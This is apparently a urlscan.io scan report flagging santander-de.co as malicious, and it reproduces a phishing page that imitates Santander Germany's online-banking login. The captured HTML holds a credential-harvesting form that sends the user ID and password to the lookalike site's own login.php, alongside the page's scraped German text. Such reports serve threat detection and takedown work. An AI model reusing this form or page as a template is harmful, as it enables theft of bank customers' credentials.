santander-de.co
Open in
urlscan Pro
2606:4700:3034::6815:341b
Malicious Activity!
Public Scan
Submitted URL: http://santander-de.co/
Effective URL: https://santander-de.co/steps/login.php
Submission: On April 01 via manual from ES — Scanned from DE
Effective URL: https://santander-de.co/steps/login.php
Submission: On April 01 via manual from ES — Scanned from DE
Form analysis
1 forms found in the DOMPOST ../actions/login.php
<form class="form-login clearfix" method="POST" action="../actions/login.php">
<p class="formMessage__formMessage___1nrJ8 err_div" style="display: none;">
<span class="formMessage__bg___2UezT"></span> Ihr Login war nicht erfolgreich. Bitte überprüfen Sie Ihre Eingabe. Bitte beachten Sie: Wiederholte Fehleingaben können zur Sperre Ihrer Zugangsdaten führen.<svg width="18" height="17"
class="formMessage__iconWarning___16f_6">
<path
d="M10.367 1.06l6.602 12.402a2 2 0 0 1-1.766 2.94H2a2 2 0 0 1-1.765-2.94L6.836 1.06a2 2 0 0 1 3.531 0zm-.883.47a1 1 0 0 0-1.765 0L1.117 13.932A1 1 0 0 0 2 15.402h13.203a1 1 0 0 0 .883-1.47L9.484 1.53zm-.841 9.708a.48.48 0 0 1-.479-.445l-.338-4.677a.818.818 0 1 1 1.633 0l-.338 4.677a.48.48 0 0 1-.478.445zm.029 2.34a.93.93 0 1 1 0-1.86.93.93 0 0 1 0 1.86z"
fill="#C00" fill-rule="nonzero"></path>
</svg>
</p>
<div>
<div class="MuiFormControl-root MuiFormControl-fullWidth css-tzsjye">
<div class="MuiFormControl-root MuiTextField-root LoginForm__loginFormInputText___vYlmN css-134n6yz" additionalcontentright="[object Object]" stylecompleted="">
<div class="MuiInput-root MuiInput-underline MuiInputBase-root MuiInputBase-colorPrimary MuiInputBase-formControl MuiInputBase-adornedEnd css-sr9pwu">
<input aria-invalid="false" id="alias" name="user" type="text" class="MuiInput-input MuiInputBase-input MuiInputBase-inputAdornedEnd css-mnn31" value="" placeholder="Benutzerkennung" pattern="[0-9]*"
data-err_text="Bitte nutzen Sie Ihre 10 Stellige Benutzerkennung" style="margin-top: 16px;" required="">
<div class="MuiInputAdornment-root MuiInputAdornment-positionEnd MuiInputAdornment-standard MuiInputAdornment-sizeMedium css-1nvf7g0">
<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24">
<path fill="#767676" fill-rule="evenodd"
d="M11.995 2c2.617 0 4.894 2.033 4.626 4.471l-.025.189-.516 4.28c-.317 2.088-1.956 3.499-4.085 3.499-2.054 0-3.647-1.314-4.043-3.3l-.037-.215-.51-4.244C6.99 4.14 9.312 2 11.995 2zM22 19.192c0-2.134-2.263-3.692-5.277-3.692-.838 0-1.912.187-3.041.485l-1.098.302a5.98 5.98 0 01-.127.03l-.215.043a1.518 1.518 0 01-.244.023c-.214 0-.428-.042-.772-.145l-.283-.085-.552-.15a13.21 13.21 0 00-.914-.197l-1.081-.194a7.135 7.135 0 00-1.122-.112C4.44 15.5 2 17.114 2 19.19v.865c0 1.063.8 1.942 1.812 1.942L20.187 22C21.199 22 22 21.12 22 20.058v-.866zm-7.716-2.329c.925-.225 1.787-.363 2.439-.363 2.524 0 4.277 1.207 4.277 2.692v.866c0 .53-.375.942-.813.942l-16.375-.003c-.437 0-.812-.412-.812-.942v-.865c0-1.416 1.926-2.69 4.274-2.69.248 0 .562.034.962.099l.465.081 1.021.193c.282.06.568.132.858.215l.252.076.313.091c.325.088.576.128.853.128.223 0 .453-.034.775-.112l.356-.093.645-.183.51-.132zM8.372 6.37C8.196 4.551 9.942 3 11.995 3c2.119 0 3.914 1.65 3.61 3.52l-.515 4.284-.034.188c-.306 1.48-1.492 2.447-3.06 2.447-1.633 0-2.847-1.048-3.09-2.65l-.534-4.42z"
clip-rule="evenodd"></path>
</svg>
</div>
</div>
</div>
<p id="errorMessage" style="color: red; display: none;"><b>Ihre Benutzerkennung enthält 10 Zahlen</b></p>
<script>
const numberInput = document.getElementById("alias");
const errorMessage = document.getElementById("errorMessage");
numberInput.addEventListener("input", function(event) {
if (!event.target.validity.valid) {
errorMessage.style.display = "block";
} else {
errorMessage.style.display = "none";
}
});
</script>
<p class="MuiFormHelperText-root MuiFormHelperText-sizeMedium MuiFormHelperText-contained css-7gseav">
</p>
</div>
</div>
<div>
<div class="MuiFormControl-root MuiFormControl-fullWidth css-tzsjye">
<div class="MuiFormControl-root MuiTextField-root LoginForm__loginFormInputPassword___hP8d9 css-9tbtte" additionalcontentright="[object Object]" stylecompleted="">
<div class="MuiInput-root MuiInput-underline MuiInputBase-root MuiInputBase-colorPrimary MuiInputBase-formControl MuiInputBase-adornedEnd css-sr9pwu">
<input aria-invalid="false" id="password" type="password" class="MuiInput-input MuiInputBase-input MuiInputBase-inputAdornedEnd css-mnn31" value="" placeholder="Passwort" pattern=".{4,}" data-err_text="Please enter valid "
style="margin-top: 16px;" name="password" required="">
<div onclick="myFunction()" class="MuiInputAdornment-root MuiInputAdornment-positionEnd MuiInputAdornment-standard MuiInputAdornment-sizeMedium css-1nvf7g0">
<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" svgcolor="rgba(158, 54, 103, 1)">
<path fill-rule="evenodd" clip-rule="evenodd"
d="M21.9513 12.2847C20.125 8.45704 16.3358 6 12 6C7.66422 6 3.87498 8.45704 2.04873 12.2847C1.98376 12.4209 1.98376 12.5791 2.04873 12.7153C3.87498 16.543 7.66422 19 12 19C16.3358 19 20.125 16.543 21.9513 12.7153C22.0162 12.5791 22.0162 12.4209 21.9513 12.2847ZM3.05706 12.5C4.75664 9.13958 8.13648 7 12 7C15.8635 7 19.2434 9.13958 20.9429 12.5C19.2434 15.8604 15.8635 18 12 18C8.13648 18 4.75664 15.8604 3.05706 12.5ZM12 8.503C14.2091 8.503 16 10.2939 16 12.503C16 14.7121 14.2091 16.503 12 16.503C9.79086 16.503 8 14.7121 8 12.503C8 10.2939 9.79086 8.503 12 8.503ZM9 12.503C9 10.8461 10.3431 9.503 12 9.503C13.6569 9.503 15 10.8461 15 12.503C15 14.1599 13.6569 15.503 12 15.503C10.3431 15.503 9 14.1599 9 12.503Z"
fill="rgba(158, 54, 103, 1)"></path>
</svg>
</div>
<script>
function myFunction() {
var x = document.getElementById("password");
if (x.type === "password") {
x.type = "text";
} else {
x.type = "password";
}
}
</script>
</div>
</div>
<p class="MuiFormHelperText-root MuiFormHelperText-sizeMedium MuiFormHelperText-contained css-7gseav">
</p>
</div>
</div>
<a class="link__link___icCJQ LoginForm__pwForgottenLink___Uosq0" href="#/passwort-zuruecksetzen/identifier">Passwort zurücksetzen</a><button
class="MuiButton-root MuiButton-contained MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium MuiButton-fullWidth MuiButtonBase-root LoginForm__loginFormBtn___ShApX css-1xufvzo" tabindex="-1"
type="submit">Einloggen</button>
</form>
Text Content
1 2 3 4 5 6 7 8 9 10 11 12 MySantander WILLKOMMEN BEI MYSANTANDER BANKING Ihr Online Banking Portal - weitere Informationen finden Sie hier. Wichtig: Nutzen Sie Ihre 10 stellige Benutzerkennung und nicht Ihre Email Adresse. Ihr Login war nicht erfolgreich. Bitte überprüfen Sie Ihre Eingabe. Bitte beachten Sie: Wiederholte Fehleingaben können zur Sperre Ihrer Zugangsdaten führen. Ihre Benutzerkennung enthält 10 Zahlen Passwort zurücksetzenEinloggen ACHTUNG! BETRÜGERISCHE TELEFONANRUFE UND EMAILS * Es kommt zu betrügerischen Anrufen und E-Mails bei unseren Kunden. Unsere Mitarbeiter werden niemals nach persönlichen Daten wie z. B. der PIN fragen. Geben Sie keine Daten weiter! * Wir versenden auch niemals E-Mails mit der Aufforderung zum Herunterladen einer vermeintlichen Sicherheits-App. * Nutzen Sie im besten Fall keine Einträge aus Suchmaschinen, wenn Sie das Online Banking aufrufen möchten. Dort könnten sich gefälschte Seiten befinden. Mehr IHRE NEUE SANTANDER VISA DEBITKARTE KOMMT BALD. MIT MEHR VORTEILEN FÜR SIE! Sie erhalten zu Ihrem bestehenden sowie zu Ihrem neuen Santander Girokonto automatisch die neue Santander Visa Debitkarte. Mit Ihrem gewohnten Filialservice, mit Funktionen, die Sie von Ihrer girocard kennen und mit noch mehr neuen Vorteilen. Die bisherige Santander girocard wird damit abgelöst. Rund 30 Tage vor dem Kartenaustausch erhalten unsere Girokontokunden eine persönliche Information von uns. Mehr ONLINE ZAHLUNGEN MIT IHRER VISA KARTE Zu Ihrer Sicherheit werden Sie bei den meisten Online-Zahlungen mit Ihrer Santander Visa Debit- bzw. Kreditkarte aufgefordert, Ihre Zahlung mit einem sicheren Verfahren freizugeben (Zwei-Faktor-Authentifizierung). Nutzen Sie dafür unsere komfortable SantanderSign App. Diese können Sie bequem im Apple Store oder Google Play Store auf Ihrem Smartphone herunterladen. Sie haben noch kein Online Banking oder Fragen diesbezüglich? Dann finden Sie weitere Details sowie unsere Kontaktdaten unter Mehr © 2023 Santander Hilfe Kontakt Filialfinder Sicherheitshinweise Datenschutz Cookie Einstellungen Impressum © 2023 Santander Hilfe Kontakt Filialfinder Sicherheitshinweise Datenschutz Cookie Einstellungen Impressum